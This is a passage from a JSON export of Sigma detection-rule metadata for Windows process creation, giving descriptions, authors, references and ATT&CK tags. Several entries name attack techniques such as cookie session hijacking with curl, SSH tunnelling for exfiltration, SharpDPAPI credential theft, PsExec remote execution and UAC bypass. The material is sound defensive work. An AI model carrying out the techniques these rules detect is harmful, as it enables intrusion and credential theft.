"process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", "https://www.radmin.fr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_radmin.yml" ], "tags": [ "attack.execution", "attack.lateral-movement", "attack.t1072" ] }, "related": [ { "dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "value": "PUA - Radmin Viewer Utility Execution" }, { "description": "Detects when verclsid.exe is used to run COM object via GUID", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_verclsid_runs_com.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d06be4b9-8045-428b-a567-740a26d9db25", "value": "Verclsid.exe Runs COM Object" }, { "description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"-ExecutionPolicy\" flag.", "meta": { "author": "frack113", "creation_date": "2021-11-01", "falsepositive": [ "Administrator scripts" ], "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4", "https://adsecurity.org/?p=2604", "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", "value": "Change PowerShell Policies to an Insecure Level" }, { "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." ], "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://twitter.com/jonasLyk/status/1555914501802921984", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "value": "Use NTFS Short Name in Command Line" }, { "description": "Detects the creation of scheduled tasks by user accounts via the \"schtasks\" utility.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Administrative activity", "Software installation" ], "filename": "proc_creation_win_schtasks_creation.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.privilege-escalation", "attack.t1053.005", "attack.s0111", "car.2013-08-001", "stp.1u" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189", "value": "Scheduled Task Creation Via Schtasks.EXE" }, { "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_winsat.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", "value": "UAC Bypass Abusing Winsat Path Parsing - Process" }, { "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "89ca78fd-b37c-4310-b3d3-81a023f83936", "value": "Schtasks Creation Or Modification With SYSTEM Privileges" }, { "description": "Detects execution of \"curl.exe\" with the \"-c\" flag in order to save cookie data.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_curl_cookie_hijacking.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking.yml" ], "tags": [ "attack.execution" ] }, "uuid": "5a6e1e16-07de-48d8-8aae-faa766c05e88", "value": "Potential Cookies Session Hijacking" }, { "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ssh_rdp_tunneling.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssh_rdp_tunneling.yml" ], "tags": [ "attack.command-and-control", "attack.t1572" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", "value": "Potential RDP Tunneling Via SSH" }, { "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-12-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dtrace_kernel_dump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", "https://twitter.com/0gtweet/status/1474899714290208777?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", "value": "Suspicious Kernel Dump Using Dtrace" }, { "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_decode.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/JohnLaTwC/status/835149808817991680", "https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_decode.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "value": "File Decoded From Base64/Hex Via Certutil.EXE" }, { "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", "meta": { "author": "frack113", "creation_date": "2022-05-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_gpresult_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml" ], "tags": [ "attack.discovery", "attack.t1615" ] }, "related": [ { "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", "value": "Gpresult Display Group Policy Information" }, { "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psexec", "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml" ], "tags": [ "attack.resource-development", "attack.t1587.001" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ea011323-7045-460b-b2d7-0f7442ea6b38", "value": "Potential PsExec Remote Execution" }, { "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", "meta": { "author": "frack113", "creation_date": "2022-01-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_instalutil_no_log_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", "https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "d042284c-a296-4988-9be5-f424fadcc28c", "value": "Suspicious Execution of InstallUtil Without Log" }, { "description": "Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the \"HTTP\" and \"HTTPS\" protocols to point to the \"My Computer\" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content", "https://twitter.com/M_haggis/status/1699056847154725107", "https://twitter.com/JAMESWT_MHT/status/1699042827261391247", "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml" ], "tags": [ "attack.execution", "attack.defense-evasion" ] }, "uuid": "10344bb3-7f65-46c2-b915-2d00d47be5b0", "value": "IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI" }, { "description": "Detects suspicious mshta process execution patterns", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-07-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mshta_susp_pattern.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.echotrail.io/insights/search/mshta.exe", "https://en.wikipedia.org/wiki/HTML_Application", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml" ], "tags": [ "attack.execution", "attack.t1106" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", "value": "Suspicious Mshta.EXE Execution Patterns" }, { "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", "https://github.com/fireeye/DueDLLigence", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", "value": "DLL Execution via Rasautou.exe" }, { "description": "Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata.\nSharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharp_dpapi_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/GhostPack/SharpDPAPI", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_dpapi_execution.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1134.001", "attack.t1134.003" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8cdeb020-e31e-4f88-a582-f53dcfbda819", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c7d33b50-f690-4b51-8cfb-0fb912a31e57", "value": "HackTool - SharpDPAPI Execution" }, { "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-26", "falsepositive": [ "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly" ], "filename": "proc_creation_win_vscode_child_processes_anomalies.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1618021415852335105", "https://twitter.com/nas_bench/status/1618021838407495681", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5a3164f2-b373-4152-93cf-090b13c12d27", "value": "Potentially Suspicious Child Process Of VsCode" }, { "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-23", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_selectmyparent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_selectmyparent.yml" ], "tags": [ "attack.defense-evasion", "attack.t1134.004" ] }, "related": [ { "dest-uuid": "93591901-3172-4e94-abf8-6034ab26f44a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52ff7941-8211-46f9-84f8-9903efb7077d", "value": "HackTool - PPID Spoofing SelectMyParent Tool Execution" }, { "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.", "meta": { "author": "frack113", "creation_date": "2022-12-23", "falsepositive": [ "Legitimate administrative script" ], "filename": "proc_creation_win_powershell_frombase64string_archive.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string_archive.yml" ], "tags": [ "attack.command-and-control", "attack.t1132.001" ] }, "related": [ { "dest-uuid": "04fd5427-79c7-44ea-ae13-11b24778ff1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", "value": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation" }, { "description": "Detects changes to environment variables related to ETW logging via the CommandLine.\nThis could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_etw_modification_cmdline.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "http://managed670.rssing.com/chan-5590147/all_p1.html", "https://bunnyinside.com/?term=f71e8cb9c76a", "https://twitter.com/_xpn_/status/1268712093928378368", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41421f44-58f9-455d-838a-c398859841d4", "value": "ETW Logging Tamper In .NET Processes Via CommandLine" }, { "description": "Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-04", "falsepositive": "No established falsepositives", "filename": "proc_creation_win_mssql_veaam_susp_child_processes.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation" ] }, "uuid": "d55b793d-f847-4eea-b59a-5ab09908ac90", "value": "Suspicious Child Process Of Veeam Dabatase" }, { "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", "meta": { "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "creation_date": "2019-02-22", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_mshta_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", "https://twitter.com/mattifestation/status/1326228491302563846", "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", "http://blog.sevagas.com/?Hacking-around-HTA-files", "https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140", "attack.t1218.005", "attack.execution", "attack.t1059.007", "cve.2020-1599" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "value": "MSHTA Suspicious Execution 01" }, { "description": "Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.\nThis technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Legitimate usage of the utility by administrators to query the event log" ], "filename": "proc_creation_win_susp_eventlog_content_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3", "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a", "https://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", "http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://www.group-ib.com/blog/apt41-world-tour-2021/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon.yml" ], "tags": [ "attack.credential-access", "attack.discovery", "attack.t1552" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", "value": "Potentially Suspicious EventLog Recon Activity Using Log Query Utilities" }, { "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", "meta": { "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2022-04-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_powershell_persistence.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_powershell_persistence.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1053.005", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b66474aa-bd92-4333-a16c-298155b120df", "value": "Potential Persistence Via Powershell Search Order Hijacking - Task" }, { "description": "Detects the addition of a new rule to the Windows firewall via netsh", "meta": { "author": "Markus Neis, Sander Wiebing", "creation_date": "2019-01-29", "falsepositive": [ "Legitimate administration activity", "Software installations" ], "filename": "proc_creation_win_netsh_fw_add_rule.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20190508165435/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_rule.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004", "attack.s0246" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", "value": "New Firewall Rule Added Via Netsh.EXE" }, { "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", "meta": { "author": "Jason Lynch", "creation_date": "2019-04-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57", "https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign", 